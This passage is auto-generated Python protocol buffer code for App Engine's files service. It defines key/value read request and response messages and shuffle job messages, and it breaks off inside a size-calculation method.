_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadResponse'
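# ReadKeyValueRequest: reads key/value records from 'filename' starting at
# 'start_key', bounded by 'max_bytes' (all required); the optional 'value_pos'
# presumably resumes reading inside a previously truncated value.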
class ReadKeyValueRequest(ProtocolBuffer.ProtocolMessage):
has_filename_ = 0
filename_ = ""
has_start_key_ = 0
start_key_ = ""
has_max_bytes_ = 0
max_bytes_ = 0
has_value_pos_ = 0
value_pos_ = 0
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def filename(self): return self.filename_
def set_filename(self, x):
self.has_filename_ = 1
self.filename_ = x
def clear_filename(self):
if self.has_filename_:
self.has_filename_ = 0
self.filename_ = ""
def has_filename(self): return self.has_filename_
def start_key(self): return self.start_key_
def set_start_key(self, x):
self.has_start_key_ = 1
self.start_key_ = x
def clear_start_key(self):
if self.has_start_key_:
self.has_start_key_ = 0
self.start_key_ = ""
def has_start_key(self): return self.has_start_key_
def max_bytes(self): return self.max_bytes_
def set_max_bytes(self, x):
self.has_max_bytes_ = 1
self.max_bytes_ = x
def clear_max_bytes(self):
if self.has_max_bytes_:
self.has_max_bytes_ = 0
self.max_bytes_ = 0
def has_max_bytes(self): return self.has_max_bytes_
def value_pos(self): return self.value_pos_
def set_value_pos(self, x):
self.has_value_pos_ = 1
self.value_pos_ = x
def clear_value_pos(self):
if self.has_value_pos_:
self.has_value_pos_ = 0
self.value_pos_ = 0
def has_value_pos(self): return self.has_value_pos_
def MergeFrom(self, x):
assert x is not self
if (x.has_filename()): self.set_filename(x.filename())
if (x.has_start_key()): self.set_start_key(x.start_key())
if (x.has_max_bytes()): self.set_max_bytes(x.max_bytes())
if (x.has_value_pos()): self.set_value_pos(x.value_pos())
def Equals(self, x):
if x is self: return 1
if self.has_filename_ != x.has_filename_: return 0
if self.has_filename_ and self.filename_ != x.filename_: return 0
if self.has_start_key_ != x.has_start_key_: return 0
if self.has_start_key_ and self.start_key_ != x.start_key_: return 0
if self.has_max_bytes_ != x.has_max_bytes_: return 0
if self.has_max_bytes_ and self.max_bytes_ != x.max_bytes_: return 0
if self.has_value_pos_ != x.has_value_pos_: return 0
if self.has_value_pos_ and self.value_pos_ != x.value_pos_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_filename_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: filename not set.')
if (not self.has_start_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: start_key not set.')
if (not self.has_max_bytes_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: max_bytes not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.filename_))
n += self.lengthString(len(self.start_key_))
n += self.lengthVarInt64(self.max_bytes_)
if (self.has_value_pos_): n += 1 + self.lengthVarInt64(self.value_pos_)
return n + 3
def ByteSizePartial(self):
n = 0
if (self.has_filename_):
n += 1
n += self.lengthString(len(self.filename_))
if (self.has_start_key_):
n += 1
n += self.lengthString(len(self.start_key_))
if (self.has_max_bytes_):
n += 1
n += self.lengthVarInt64(self.max_bytes_)
if (self.has_value_pos_): n += 1 + self.lengthVarInt64(self.value_pos_)
return n
def Clear(self):
self.clear_filename()
self.clear_start_key()
self.clear_max_bytes()
self.clear_value_pos()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
out.putVarInt32(18)
out.putPrefixedString(self.start_key_)
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
if (self.has_value_pos_):
out.putVarInt32(32)
out.putVarInt64(self.value_pos_)
def OutputPartial(self, out):
if (self.has_filename_):
out.putVarInt32(10)
out.putPrefixedString(self.filename_)
if (self.has_start_key_):
out.putVarInt32(18)
out.putPrefixedString(self.start_key_)
if (self.has_max_bytes_):
out.putVarInt32(24)
out.putVarInt64(self.max_bytes_)
if (self.has_value_pos_):
out.putVarInt32(32)
out.putVarInt64(self.value_pos_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_filename(d.getPrefixedString())
continue
if tt == 18:
self.set_start_key(d.getPrefixedString())
continue
if tt == 24:
self.set_max_bytes(d.getVarInt64())
continue
if tt == 32:
self.set_value_pos(d.getVarInt64())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_filename_: res+=prefix+("filename: %s\n" % self.DebugFormatString(self.filename_))
if self.has_start_key_: res+=prefix+("start_key: %s\n" % self.DebugFormatString(self.start_key_))
if self.has_max_bytes_: res+=prefix+("max_bytes: %s\n" % self.DebugFormatInt64(self.max_bytes_))
if self.has_value_pos_: res+=prefix+("value_pos: %s\n" % self.DebugFormatInt64(self.value_pos_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kfilename = 1
kstart_key = 2
kmax_bytes = 3
kvalue_pos = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "filename",
2: "start_key",
3: "max_bytes",
4: "value_pos",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
4: ProtocolBuffer.Encoder.NUMERIC,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadKeyValueRequest'
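# ReadKeyValueResponse_KeyValue: one key/value pair; 'key' and 'value' are
# both required strings.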
class ReadKeyValueResponse_KeyValue(ProtocolBuffer.ProtocolMessage):
has_key_ = 0
key_ = ""
has_value_ = 0
value_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def key(self): return self.key_
def set_key(self, x):
self.has_key_ = 1
self.key_ = x
def clear_key(self):
if self.has_key_:
self.has_key_ = 0
self.key_ = ""
def has_key(self): return self.has_key_
def value(self): return self.value_
def set_value(self, x):
self.has_value_ = 1
self.value_ = x
def clear_value(self):
if self.has_value_:
self.has_value_ = 0
self.value_ = ""
def has_value(self): return self.has_value_
def MergeFrom(self, x):
assert x is not self
if (x.has_key()): self.set_key(x.key())
if (x.has_value()): self.set_value(x.value())
def Equals(self, x):
if x is self: return 1
if self.has_key_ != x.has_key_: return 0
if self.has_key_ and self.key_ != x.key_: return 0
if self.has_value_ != x.has_value_: return 0
if self.has_value_ and self.value_ != x.value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_key_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: key not set.')
if (not self.has_value_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: value not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.key_))
n += self.lengthString(len(self.value_))
return n + 2
def ByteSizePartial(self):
n = 0
if (self.has_key_):
n += 1
n += self.lengthString(len(self.key_))
if (self.has_value_):
n += 1
n += self.lengthString(len(self.value_))
return n
def Clear(self):
self.clear_key()
self.clear_value()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def OutputPartial(self, out):
if (self.has_key_):
out.putVarInt32(10)
out.putPrefixedString(self.key_)
if (self.has_value_):
out.putVarInt32(18)
out.putPrefixedString(self.value_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_key(d.getPrefixedString())
continue
if tt == 18:
self.set_value(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_key_: res+=prefix+("key: %s\n" % self.DebugFormatString(self.key_))
if self.has_value_: res+=prefix+("value: %s\n" % self.DebugFormatString(self.value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kkey = 1
kvalue = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "key",
2: "value",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadKeyValueResponse_KeyValue'
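# ReadKeyValueResponse: repeated KeyValue records, an optional 'next_key' for
# continuation, and 'truncated_value' flagging a partially returned value.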
class ReadKeyValueResponse(ProtocolBuffer.ProtocolMessage):
has_next_key_ = 0
next_key_ = ""
has_truncated_value_ = 0
truncated_value_ = 0
def __init__(self, contents=None):
self.data_ = []
if contents is not None: self.MergeFromString(contents)
def data_size(self): return len(self.data_)
def data_list(self): return self.data_
def data(self, i):
return self.data_[i]
def mutable_data(self, i):
return self.data_[i]
def add_data(self):
x = ReadKeyValueResponse_KeyValue()
self.data_.append(x)
return x
def clear_data(self):
self.data_ = []
def next_key(self): return self.next_key_
def set_next_key(self, x):
self.has_next_key_ = 1
self.next_key_ = x
def clear_next_key(self):
if self.has_next_key_:
self.has_next_key_ = 0
self.next_key_ = ""
def has_next_key(self): return self.has_next_key_
def truncated_value(self): return self.truncated_value_
def set_truncated_value(self, x):
self.has_truncated_value_ = 1
self.truncated_value_ = x
def clear_truncated_value(self):
if self.has_truncated_value_:
self.has_truncated_value_ = 0
self.truncated_value_ = 0
def has_truncated_value(self): return self.has_truncated_value_
def MergeFrom(self, x):
assert x is not self
for i in xrange(x.data_size()): self.add_data().CopyFrom(x.data(i))
if (x.has_next_key()): self.set_next_key(x.next_key())
if (x.has_truncated_value()): self.set_truncated_value(x.truncated_value())
def Equals(self, x):
if x is self: return 1
if len(self.data_) != len(x.data_): return 0
for e1, e2 in zip(self.data_, x.data_):
if e1 != e2: return 0
if self.has_next_key_ != x.has_next_key_: return 0
if self.has_next_key_ and self.next_key_ != x.next_key_: return 0
if self.has_truncated_value_ != x.has_truncated_value_: return 0
if self.has_truncated_value_ and self.truncated_value_ != x.truncated_value_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
for p in self.data_:
if not p.IsInitialized(debug_strs): initialized=0
return initialized
def ByteSize(self):
n = 0
n += 1 * len(self.data_)
for i in xrange(len(self.data_)): n += self.lengthString(self.data_[i].ByteSize())
if (self.has_next_key_): n += 1 + self.lengthString(len(self.next_key_))
if (self.has_truncated_value_): n += 2
return n
def ByteSizePartial(self):
n = 0
n += 1 * len(self.data_)
for i in xrange(len(self.data_)): n += self.lengthString(self.data_[i].ByteSizePartial())
if (self.has_next_key_): n += 1 + self.lengthString(len(self.next_key_))
if (self.has_truncated_value_): n += 2
return n
def Clear(self):
self.clear_data()
self.clear_next_key()
self.clear_truncated_value()
def OutputUnchecked(self, out):
for i in xrange(len(self.data_)):
out.putVarInt32(10)
out.putVarInt32(self.data_[i].ByteSize())
self.data_[i].OutputUnchecked(out)
if (self.has_next_key_):
out.putVarInt32(18)
out.putPrefixedString(self.next_key_)
if (self.has_truncated_value_):
out.putVarInt32(24)
out.putBoolean(self.truncated_value_)
def OutputPartial(self, out):
for i in xrange(len(self.data_)):
out.putVarInt32(10)
out.putVarInt32(self.data_[i].ByteSizePartial())
self.data_[i].OutputPartial(out)
if (self.has_next_key_):
out.putVarInt32(18)
out.putPrefixedString(self.next_key_)
if (self.has_truncated_value_):
out.putVarInt32(24)
out.putBoolean(self.truncated_value_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
length = d.getVarInt32()
tmp = ProtocolBuffer.Decoder(d.buffer(), d.pos(), d.pos() + length)
d.skip(length)
self.add_data().TryMerge(tmp)
continue
if tt == 18:
self.set_next_key(d.getPrefixedString())
continue
if tt == 24:
self.set_truncated_value(d.getBoolean())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
cnt=0
for e in self.data_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("data%s <\n" % elm)
res+=e.__str__(prefix + " ", printElemNumber)
res+=prefix+">\n"
cnt+=1
if self.has_next_key_: res+=prefix+("next_key: %s\n" % self.DebugFormatString(self.next_key_))
if self.has_truncated_value_: res+=prefix+("truncated_value: %s\n" % self.DebugFormatBool(self.truncated_value_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kdata = 1
knext_key = 2
ktruncated_value = 3
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "data",
2: "next_key",
3: "truncated_value",
}, 3)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.NUMERIC,
}, 3, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ReadKeyValueResponse'
class ShuffleEnums(ProtocolBuffer.ProtocolMessage):
RECORDS_KEY_VALUE_PROTO_INPUT = 1
_InputFormat_NAMES = {
1: "RECORDS_KEY_VALUE_PROTO_INPUT",
}
def InputFormat_Name(cls, x): return cls._InputFormat_NAMES.get(x, "")
InputFormat_Name = classmethod(InputFormat_Name)
RECORDS_KEY_MULTI_VALUE_PROTO_OUTPUT = 1
_OutputFormat_NAMES = {
1: "RECORDS_KEY_MULTI_VALUE_PROTO_OUTPUT",
}
def OutputFormat_Name(cls, x): return cls._OutputFormat_NAMES.get(x, "")
OutputFormat_Name = classmethod(OutputFormat_Name)
UNKNOWN = 1
RUNNING = 2
SUCCESS = 3
FAILURE = 4
INVALID_INPUT = 5
OUTPUT_ALREADY_EXISTS = 6
INCORRECT_SHUFFLE_SIZE_BYTES = 7
_Status_NAMES = {
1: "UNKNOWN",
2: "RUNNING",
3: "SUCCESS",
4: "FAILURE",
5: "INVALID_INPUT",
6: "OUTPUT_ALREADY_EXISTS",
7: "INCORRECT_SHUFFLE_SIZE_BYTES",
}
def Status_Name(cls, x): return cls._Status_NAMES.get(x, "")
Status_Name = classmethod(Status_Name)
def __init__(self, contents=None):
pass
if contents is not None: self.MergeFromString(contents)
def MergeFrom(self, x):
assert x is not self
def Equals(self, x):
if x is self: return 1
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
return n
def ByteSizePartial(self):
n = 0
return n
def Clear(self):
pass
def OutputUnchecked(self, out):
pass
def OutputPartial(self, out):
pass
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
}, 0)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
}, 0, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleEnums'
class ShuffleInputSpecification(ProtocolBuffer.ProtocolMessage):
has_format_ = 0
format_ = 1
has_path_ = 0
path_ = ""
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def format(self): return self.format_
def set_format(self, x):
self.has_format_ = 1
self.format_ = x
def clear_format(self):
if self.has_format_:
self.has_format_ = 0
self.format_ = 1
def has_format(self): return self.has_format_
def path(self): return self.path_
def set_path(self, x):
self.has_path_ = 1
self.path_ = x
def clear_path(self):
if self.has_path_:
self.has_path_ = 0
self.path_ = ""
def has_path(self): return self.has_path_
def MergeFrom(self, x):
assert x is not self
if (x.has_format()): self.set_format(x.format())
if (x.has_path()): self.set_path(x.path())
def Equals(self, x):
if x is self: return 1
if self.has_format_ != x.has_format_: return 0
if self.has_format_ and self.format_ != x.format_: return 0
if self.has_path_ != x.has_path_: return 0
if self.has_path_ and self.path_ != x.path_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_path_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: path not set.')
return initialized
def ByteSize(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
n += self.lengthString(len(self.path_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
if (self.has_path_):
n += 1
n += self.lengthString(len(self.path_))
return n
def Clear(self):
self.clear_format()
self.clear_path()
def OutputUnchecked(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
out.putVarInt32(18)
out.putPrefixedString(self.path_)
def OutputPartial(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
if (self.has_path_):
out.putVarInt32(18)
out.putPrefixedString(self.path_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_format(d.getVarInt32())
continue
if tt == 18:
self.set_path(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_format_: res+=prefix+("format: %s\n" % self.DebugFormatInt32(self.format_))
if self.has_path_: res+=prefix+("path: %s\n" % self.DebugFormatString(self.path_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kformat = 1
kpath = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "format",
2: "path",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleInputSpecification'
class ShuffleOutputSpecification(ProtocolBuffer.ProtocolMessage):
has_format_ = 0
format_ = 1
def __init__(self, contents=None):
self.path_ = []
if contents is not None: self.MergeFromString(contents)
def format(self): return self.format_
def set_format(self, x):
self.has_format_ = 1
self.format_ = x
def clear_format(self):
if self.has_format_:
self.has_format_ = 0
self.format_ = 1
def has_format(self): return self.has_format_
def path_size(self): return len(self.path_)
def path_list(self): return self.path_
def path(self, i):
return self.path_[i]
def set_path(self, i, x):
self.path_[i] = x
def add_path(self, x):
self.path_.append(x)
def clear_path(self):
self.path_ = []
def MergeFrom(self, x):
assert x is not self
if (x.has_format()): self.set_format(x.format())
for i in xrange(x.path_size()): self.add_path(x.path(i))
def Equals(self, x):
if x is self: return 1
if self.has_format_ != x.has_format_: return 0
if self.has_format_ and self.format_ != x.format_: return 0
if len(self.path_) != len(x.path_): return 0
for e1, e2 in zip(self.path_, x.path_):
if e1 != e2: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
return initialized
def ByteSize(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
n += 1 * len(self.path_)
for i in xrange(len(self.path_)): n += self.lengthString(len(self.path_[i]))
return n
def ByteSizePartial(self):
n = 0
if (self.has_format_): n += 1 + self.lengthVarInt64(self.format_)
n += 1 * len(self.path_)
for i in xrange(len(self.path_)): n += self.lengthString(len(self.path_[i]))
return n
def Clear(self):
self.clear_format()
self.clear_path()
def OutputUnchecked(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
for i in xrange(len(self.path_)):
out.putVarInt32(18)
out.putPrefixedString(self.path_[i])
def OutputPartial(self, out):
if (self.has_format_):
out.putVarInt32(8)
out.putVarInt32(self.format_)
for i in xrange(len(self.path_)):
out.putVarInt32(18)
out.putPrefixedString(self.path_[i])
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 8:
self.set_format(d.getVarInt32())
continue
if tt == 18:
self.add_path(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_format_: res+=prefix+("format: %s\n" % self.DebugFormatInt32(self.format_))
cnt=0
for e in self.path_:
elm=""
if printElemNumber: elm="(%d)" % cnt
res+=prefix+("path%s: %s\n" % (elm, self.DebugFormatString(e)))
cnt+=1
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kformat = 1
kpath = 2
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "format",
2: "path",
}, 2)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.NUMERIC,
2: ProtocolBuffer.Encoder.STRING,
}, 2, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleOutputSpecification'
class ShuffleRequest_Callback(ProtocolBuffer.ProtocolMessage):
has_url_ = 0
url_ = ""
has_app_version_id_ = 0
app_version_id_ = ""
has_method_ = 0
method_ = "POST"
has_queue_ = 0
queue_ = "default"
def __init__(self, contents=None):
if contents is not None: self.MergeFromString(contents)
def url(self): return self.url_
def set_url(self, x):
self.has_url_ = 1
self.url_ = x
def clear_url(self):
if self.has_url_:
self.has_url_ = 0
self.url_ = ""
def has_url(self): return self.has_url_
def app_version_id(self): return self.app_version_id_
def set_app_version_id(self, x):
self.has_app_version_id_ = 1
self.app_version_id_ = x
def clear_app_version_id(self):
if self.has_app_version_id_:
self.has_app_version_id_ = 0
self.app_version_id_ = ""
def has_app_version_id(self): return self.has_app_version_id_
def method(self): return self.method_
def set_method(self, x):
self.has_method_ = 1
self.method_ = x
def clear_method(self):
if self.has_method_:
self.has_method_ = 0
self.method_ = "POST"
def has_method(self): return self.has_method_
def queue(self): return self.queue_
def set_queue(self, x):
self.has_queue_ = 1
self.queue_ = x
def clear_queue(self):
if self.has_queue_:
self.has_queue_ = 0
self.queue_ = "default"
def has_queue(self): return self.has_queue_
def MergeFrom(self, x):
assert x is not self
if (x.has_url()): self.set_url(x.url())
if (x.has_app_version_id()): self.set_app_version_id(x.app_version_id())
if (x.has_method()): self.set_method(x.method())
if (x.has_queue()): self.set_queue(x.queue())
def Equals(self, x):
if x is self: return 1
if self.has_url_ != x.has_url_: return 0
if self.has_url_ and self.url_ != x.url_: return 0
if self.has_app_version_id_ != x.has_app_version_id_: return 0
if self.has_app_version_id_ and self.app_version_id_ != x.app_version_id_: return 0
if self.has_method_ != x.has_method_: return 0
if self.has_method_ and self.method_ != x.method_: return 0
if self.has_queue_ != x.has_queue_: return 0
if self.has_queue_ and self.queue_ != x.queue_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_url_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: url not set.')
return initialized
def ByteSize(self):
n = 0
n += self.lengthString(len(self.url_))
if (self.has_app_version_id_): n += 1 + self.lengthString(len(self.app_version_id_))
if (self.has_method_): n += 1 + self.lengthString(len(self.method_))
if (self.has_queue_): n += 1 + self.lengthString(len(self.queue_))
return n + 1
def ByteSizePartial(self):
n = 0
if (self.has_url_):
n += 1
n += self.lengthString(len(self.url_))
if (self.has_app_version_id_): n += 1 + self.lengthString(len(self.app_version_id_))
if (self.has_method_): n += 1 + self.lengthString(len(self.method_))
if (self.has_queue_): n += 1 + self.lengthString(len(self.queue_))
return n
def Clear(self):
self.clear_url()
self.clear_app_version_id()
self.clear_method()
self.clear_queue()
def OutputUnchecked(self, out):
out.putVarInt32(10)
out.putPrefixedString(self.url_)
if (self.has_app_version_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_version_id_)
if (self.has_method_):
out.putVarInt32(26)
out.putPrefixedString(self.method_)
if (self.has_queue_):
out.putVarInt32(34)
out.putPrefixedString(self.queue_)
def OutputPartial(self, out):
if (self.has_url_):
out.putVarInt32(10)
out.putPrefixedString(self.url_)
if (self.has_app_version_id_):
out.putVarInt32(18)
out.putPrefixedString(self.app_version_id_)
if (self.has_method_):
out.putVarInt32(26)
out.putPrefixedString(self.method_)
if (self.has_queue_):
out.putVarInt32(34)
out.putPrefixedString(self.queue_)
def TryMerge(self, d):
while d.avail() > 0:
tt = d.getVarInt32()
if tt == 10:
self.set_url(d.getPrefixedString())
continue
if tt == 18:
self.set_app_version_id(d.getPrefixedString())
continue
if tt == 26:
self.set_method(d.getPrefixedString())
continue
if tt == 34:
self.set_queue(d.getPrefixedString())
continue
if (tt == 0): raise ProtocolBuffer.ProtocolBufferDecodeError
d.skipData(tt)
def __str__(self, prefix="", printElemNumber=0):
res=""
if self.has_url_: res+=prefix+("url: %s\n" % self.DebugFormatString(self.url_))
if self.has_app_version_id_: res+=prefix+("app_version_id: %s\n" % self.DebugFormatString(self.app_version_id_))
if self.has_method_: res+=prefix+("method: %s\n" % self.DebugFormatString(self.method_))
if self.has_queue_: res+=prefix+("queue: %s\n" % self.DebugFormatString(self.queue_))
return res
def _BuildTagLookupTable(sparse, maxtag, default=None):
return tuple([sparse.get(i, default) for i in xrange(0, 1+maxtag)])
kurl = 1
kapp_version_id = 2
kmethod = 3
kqueue = 4
_TEXT = _BuildTagLookupTable({
0: "ErrorCode",
1: "url",
2: "app_version_id",
3: "method",
4: "queue",
}, 4)
_TYPES = _BuildTagLookupTable({
0: ProtocolBuffer.Encoder.NUMERIC,
1: ProtocolBuffer.Encoder.STRING,
2: ProtocolBuffer.Encoder.STRING,
3: ProtocolBuffer.Encoder.STRING,
4: ProtocolBuffer.Encoder.STRING,
}, 4, ProtocolBuffer.Encoder.MAX_TYPE)
_STYLE = """"""
_STYLE_CONTENT_TYPE = """"""
_PROTO_DESCRIPTOR_NAME = 'apphosting.files.ShuffleRequest_Callback'
class ShuffleRequest(ProtocolBuffer.ProtocolMessage):
has_shuffle_name_ = 0
shuffle_name_ = ""
has_output_ = 0
has_shuffle_size_bytes_ = 0
shuffle_size_bytes_ = 0
has_callback_ = 0
def __init__(self, contents=None):
self.input_ = []
self.output_ = ShuffleOutputSpecification()
self.callback_ = ShuffleRequest_Callback()
if contents is not None: self.MergeFromString(contents)
def shuffle_name(self): return self.shuffle_name_
def set_shuffle_name(self, x):
self.has_shuffle_name_ = 1
self.shuffle_name_ = x
def clear_shuffle_name(self):
if self.has_shuffle_name_:
self.has_shuffle_name_ = 0
self.shuffle_name_ = ""
def has_shuffle_name(self): return self.has_shuffle_name_
def input_size(self): return len(self.input_)
def input_list(self): return self.input_
def input(self, i):
return self.input_[i]
def mutable_input(self, i):
return self.input_[i]
def add_input(self):
x = ShuffleInputSpecification()
self.input_.append(x)
return x
def clear_input(self):
self.input_ = []
def output(self): return self.output_
def mutable_output(self): self.has_output_ = 1; return self.output_
def clear_output(self):self.has_output_ = 0; self.output_.Clear()
def has_output(self): return self.has_output_
def shuffle_size_bytes(self): return self.shuffle_size_bytes_
def set_shuffle_size_bytes(self, x):
self.has_shuffle_size_bytes_ = 1
self.shuffle_size_bytes_ = x
def clear_shuffle_size_bytes(self):
if self.has_shuffle_size_bytes_:
self.has_shuffle_size_bytes_ = 0
self.shuffle_size_bytes_ = 0
def has_shuffle_size_bytes(self): return self.has_shuffle_size_bytes_
def callback(self): return self.callback_
def mutable_callback(self): self.has_callback_ = 1; return self.callback_
def clear_callback(self):self.has_callback_ = 0; self.callback_.Clear()
def has_callback(self): return self.has_callback_
def MergeFrom(self, x):
assert x is not self
if (x.has_shuffle_name()): self.set_shuffle_name(x.shuffle_name())
for i in xrange(x.input_size()): self.add_input().CopyFrom(x.input(i))
if (x.has_output()): self.mutable_output().MergeFrom(x.output())
if (x.has_shuffle_size_bytes()): self.set_shuffle_size_bytes(x.shuffle_size_bytes())
if (x.has_callback()): self.mutable_callback().MergeFrom(x.callback())
def Equals(self, x):
if x is self: return 1
if self.has_shuffle_name_ != x.has_shuffle_name_: return 0
if self.has_shuffle_name_ and self.shuffle_name_ != x.shuffle_name_: return 0
if len(self.input_) != len(x.input_): return 0
for e1, e2 in zip(self.input_, x.input_):
if e1 != e2: return 0
if self.has_output_ != x.has_output_: return 0
if self.has_output_ and self.output_ != x.output_: return 0
if self.has_shuffle_size_bytes_ != x.has_shuffle_size_bytes_: return 0
if self.has_shuffle_size_bytes_ and self.shuffle_size_bytes_ != x.shuffle_size_bytes_: return 0
if self.has_callback_ != x.has_callback_: return 0
if self.has_callback_ and self.callback_ != x.callback_: return 0
return 1
def IsInitialized(self, debug_strs=None):
initialized = 1
if (not self.has_shuffle_name_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_name not set.')
for p in self.input_:
if not p.IsInitialized(debug_strs): initialized=0
if (not self.has_output_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: output not set.')
elif not self.output_.IsInitialized(debug_strs): initialized = 0
if (not self.has_shuffle_size_bytes_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: shuffle_size_bytes not set.')
if (not self.has_callback_):
initialized = 0
if debug_strs is not None:
debug_strs.append('Required field: callback not set.')
elif not self.callback_.IsInitialized(debug_strs): initialized = 0
return initialized
def ByteSize(self):
n = 0
